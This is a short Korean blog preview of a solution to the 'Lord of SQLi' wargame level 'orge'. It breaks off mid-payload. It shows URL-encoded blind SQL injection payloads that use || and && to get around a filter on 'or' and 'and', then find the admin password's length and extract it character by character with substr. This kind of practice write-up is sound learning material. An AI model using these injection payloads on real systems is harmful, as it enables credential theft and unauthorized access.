728x90 lord of sql1 LOS 7.orge 풀이 (난이도 상) :: 문제풀이 if(preg_match ('/or|and/i', $_GET [pw ])) exit("HeHe"); 여기도 마찬가지로 or과 and를 사용할 수 없게 되어있다. ?pw=%27%20||%20length(pw)>5%23 이걸 사용했더니 hello guest가 떠서 5이상의 숫자를 넣어보았다. ?pw=%27%20||%20length(pw)=8%23 여기서 hello admin이 떠서 pw의 길이가 8이라는 것을 알아내었다. ?pw=%27%20||%20id=%27admin%27%26%26substr(pw,1,1)=6%23 ?pw=%27%20||%20id=%27admin%27%26%26substr(pw,2,1)=%27c ?pw=%27%20||%20id=%27admin%27%26%26substr(pw.. 2019. 11. 8. 이전 1 다음 728x90
